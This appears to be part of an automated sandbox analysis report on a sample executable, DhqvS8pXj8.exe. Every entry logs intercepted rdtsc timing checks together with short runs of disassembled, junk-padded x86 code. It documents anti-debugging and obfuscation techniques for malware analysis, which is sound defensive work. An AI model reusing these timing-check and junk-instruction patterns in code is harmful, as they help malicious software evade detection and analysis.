Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A063C second address: 50A064C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A35FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A064C second address: 50A0650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0650 second address: 50A0668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5BC10A35FDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0668 second address: 50A0678 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A0461 second address: 50A047B instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BC10A35FEh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A047B second address: 50A048D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B01BD second address: 50B01C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B01C1 second address: 50B01DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B01DE second address: 50B01FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, cx 0x0000000e push eax 0x0000000f push edx 0x00000010 movzx eax, dx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B01FD second address: 50B023C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5BC10B709Bh 0x00000008 xor ax, 708Eh 0x0000000d jmp 00007F5BC10B70A9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5BC10B709Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50C03D9 second address: 50C03DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50C03DD second address: 50C03E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50C03E3 second address: 50C0466 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F5BC10A35FAh 0x0000000b and esi, 747649C8h 0x00000011 jmp 00007F5BC10A35FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c call 00007F5BC10A3604h 0x00000021 mov cx, CD41h 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a call 00007F5BC10A35FFh 0x0000002f movzx esi, bx 0x00000032 pop edx 0x00000033 call 00007F5BC10A3602h 0x00000038 movzx esi, di 0x0000003b pop ebx 0x0000003c popad 0x0000003d mov eax, dword ptr [ebp+08h] 0x00000040 jmp 00007F5BC10A35FAh 0x00000045 and dword ptr [eax], 00000000h 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50A059F second address: 50A05A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0EF7 second address: 50B0EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0EFB second address: 50B0F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0F01 second address: 50B0F20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ebx, ecx 0x0000000d mov edi, esi 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50B0F20 second address: 50B0F26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50C01C7 second address: 50C021F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F5BC10A3606h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edi, esi 0x00000015 pushfd 0x00000016 jmp 00007F5BC10A3608h 0x0000001b add esi, 267BCD48h 0x00000021 jmp 00007F5BC10A35FBh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50C021F second address: 50C024C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5BC10B709Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E0700 second address: 50E0706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E0706 second address: 50E0739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b call 00007F5BC10B70A4h 0x00000010 mov bh, ch 0x00000012 pop ebx 0x00000013 mov di, ax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E0739 second address: 50E073F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E073F second address: 50E0754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 930Eh 0x00000007 mov bx, D21Ah 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov ax, dx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E0754 second address: 50E078B instructions: 0x00000000 rdtsc 0x00000002 mov bx, 836Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F5BC10A3605h 0x0000000d mov dl, ah 0x0000000f pop edi 0x00000010 popad 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5BC10A35FFh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E078B second address: 50E07A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E07A3 second address: 50E07A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E07A7 second address: 50E0829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a pushad 0x0000000b mov edi, 037BC930h 0x00000010 pushfd 0x00000011 jmp 00007F5BC10B70A9h 0x00000016 or eax, 6DBBB8B6h 0x0000001c jmp 00007F5BC10B70A1h 0x00000021 popfd 0x00000022 popad 0x00000023 je 00007F5C32F0A212h 0x00000029 pushad 0x0000002a push esi 0x0000002b jmp 00007F5BC10B70A3h 0x00000030 pop eax 0x00000031 mov ax, dx 0x00000034 popad 0x00000035 mov ecx, eax 0x00000037 pushad 0x00000038 mov si, di 0x0000003b movsx edx, cx 0x0000003e popad 0x0000003f xor eax, dword ptr [ebp+08h] 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F5BC10B70A0h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E0829 second address: 50E0852 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BC10A3605h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E0852 second address: 50E08AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10B70A7h 0x00000009 or si, BE0Eh 0x0000000e jmp 00007F5BC10B70A9h 0x00000013 popfd 0x00000014 push eax 0x00000015 pop edx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 ror eax, cl 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5BC10B70A9h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E08AE second address: 50E0924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BC10A35FBh 0x00000013 sbb eax, 0165617Eh 0x00000019 jmp 00007F5BC10A3609h 0x0000001e popfd 0x0000001f mov ch, 4Fh 0x00000021 popad 0x00000022 retn 0004h 0x00000025 nop 0x00000026 mov esi, eax 0x00000028 lea eax, dword ptr [ebp-08h] 0x0000002b xor esi, dword ptr [00322014h] 0x00000031 push eax 0x00000032 push eax 0x00000033 push eax 0x00000034 lea eax, dword ptr [ebp-10h] 0x00000037 push eax 0x00000038 call 00007F5BC5EA3E23h 0x0000003d push FFFFFFFEh 0x0000003f pushad 0x00000040 jmp 00007F5BC10A3609h 0x00000045 mov cx, 3DA7h 0x00000049 popad 0x0000004a pop eax 0x0000004b jmp 00007F5BC10A35FAh 0x00000050 ret 0x00000051 nop 0x00000052 push eax 0x00000053 call 00007F5BC5EA3E49h 0x00000058 mov edi, edi 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d mov dx, 18F0h 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50E0924 second address: 50E0938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B70A0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090011 second address: 5090021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A35FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090021 second address: 5090025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090025 second address: 509005D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F5BC10A35FCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F5BC10A3600h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5BC10A35FAh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 509005D second address: 509006C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 509006C second address: 5090072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090072 second address: 50900B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 and si, E78Eh 0x0000001c jmp 00007F5BC10B70A9h 0x00000021 popfd 0x00000022 mov di, si 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50900B8 second address: 50900BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50900BE second address: 50900EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F5BC10B709Ch 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50900EC second address: 5090109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3609h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090109 second address: 5090119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10B709Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090119 second address: 50901AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 jmp 00007F5BC10A3600h 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F5BC10A35FBh 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F5BC10A3604h 0x00000024 jmp 00007F5BC10A3605h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F5BC10A3600h 0x00000030 jmp 00007F5BC10A3605h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ebx, dword ptr [ebp+10h] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50901AA second address: 50901BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50901BD second address: 50901D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5BC10A3604h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50901D5 second address: 5090269 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F5BC10B70A6h 0x00000011 push eax 0x00000012 jmp 00007F5BC10B709Bh 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 mov ax, E28Bh 0x0000001d pushfd 0x0000001e jmp 00007F5BC10B70A0h 0x00000023 adc ax, 1298h 0x00000028 jmp 00007F5BC10B709Bh 0x0000002d popfd 0x0000002e popad 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F5BC10B709Bh 0x0000003b add si, AB5Eh 0x00000040 jmp 00007F5BC10B70A9h 0x00000045 popfd 0x00000046 mov esi, 1F720827h 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090269 second address: 509026F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 509026F second address: 5090273 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090273 second address: 50902FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A35FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F5BC10A3604h 0x00000013 or ax, 21B8h 0x00000018 jmp 00007F5BC10A35FBh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F5BC10A3604h 0x00000025 xchg eax, edi 0x00000026 pushad 0x00000027 mov eax, 1B9BC8ADh 0x0000002c mov dl, al 0x0000002e popad 0x0000002f test esi, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F5BC10A35FEh 0x0000003a jmp 00007F5BC10A3605h 0x0000003f popfd 0x00000040 movzx eax, di 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50902FE second address: 5090304 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090304 second address: 5090308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090308 second address: 5090332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5C32F5539Bh 0x0000000e jmp 00007F5BC10B70A0h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090332 second address: 5090339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 9Bh 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090339 second address: 50903B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5BC10B709Bh 0x00000009 add ax, 284Eh 0x0000000e jmp 00007F5BC10B70A9h 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F5C32F55354h 0x00000020 pushad 0x00000021 mov esi, 5910FF4Fh 0x00000026 pushfd 0x00000027 jmp 00007F5BC10B70A4h 0x0000002c jmp 00007F5BC10B70A5h 0x00000031 popfd 0x00000032 popad 0x00000033 mov edx, dword ptr [esi+44h] 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F5BC10B709Dh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50903B7 second address: 5090469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F5BC10A35FEh 0x00000011 test edx, 61000000h 0x00000017 pushad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F5BC10A35FCh 0x0000001f xor ax, 3BE8h 0x00000024 jmp 00007F5BC10A35FBh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F5BC10A3608h 0x00000030 xor ch, 00000048h 0x00000033 jmp 00007F5BC10A35FBh 0x00000038 popfd 0x00000039 popad 0x0000003a jmp 00007F5BC10A3608h 0x0000003f popad 0x00000040 jne 00007F5C32F41839h 0x00000046 pushad 0x00000047 mov ebx, eax 0x00000049 call 00007F5BC10A35FAh 0x0000004e mov ecx, 2AA2D331h 0x00000053 pop ecx 0x00000054 popad 0x00000055 test byte ptr [esi+48h], 00000001h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5090469 second address: 509046D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 509046D second address: 5090483 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3602h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50807F3 second address: 508081C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5BC10B70A5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 508081C second address: 5080864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10A3601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F5BC10A35FEh 0x0000000f push eax 0x00000010 jmp 00007F5BC10A35FBh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5BC10A3605h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080864 second address: 5080885 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 2CCD668Eh 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080885 second address: 50808BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5BC10A3603h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5BC10A3605h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50808BC second address: 5080976 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B70A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov ax, 9C03h 0x00000011 mov ebx, ecx 0x00000013 popad 0x00000014 sub ebx, ebx 0x00000016 pushad 0x00000017 call 00007F5BC10B70A1h 0x0000001c call 00007F5BC10B70A0h 0x00000021 pop esi 0x00000022 pop edx 0x00000023 movzx ecx, di 0x00000026 popad 0x00000027 test esi, esi 0x00000029 jmp 00007F5BC10B70A3h 0x0000002e je 00007F5C32F5CB09h 0x00000034 pushad 0x00000035 mov edx, ecx 0x00000037 mov di, si 0x0000003a popad 0x0000003b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000042 pushad 0x00000043 mov eax, 6C15080Fh 0x00000048 pushfd 0x00000049 jmp 00007F5BC10B70A4h 0x0000004e or esi, 68FBD5B8h 0x00000054 jmp 00007F5BC10B709Bh 0x00000059 popfd 0x0000005a popad 0x0000005b mov ecx, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F5BC10B70A5h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080976 second address: 508097C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 508097C second address: 5080980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 5080980 second address: 50809CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5C32F49011h 0x0000000e pushad 0x0000000f mov bx, 2F48h 0x00000013 pushfd 0x00000014 jmp 00007F5BC10A3601h 0x00000019 sub ax, 01B6h 0x0000001e jmp 00007F5BC10A3601h 0x00000023 popfd 0x00000024 popad 0x00000025 test byte ptr [76FB6968h], 00000002h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe RDTSC instruction interceptor: First address: 50809CA second address: 50809DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BC10B709Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
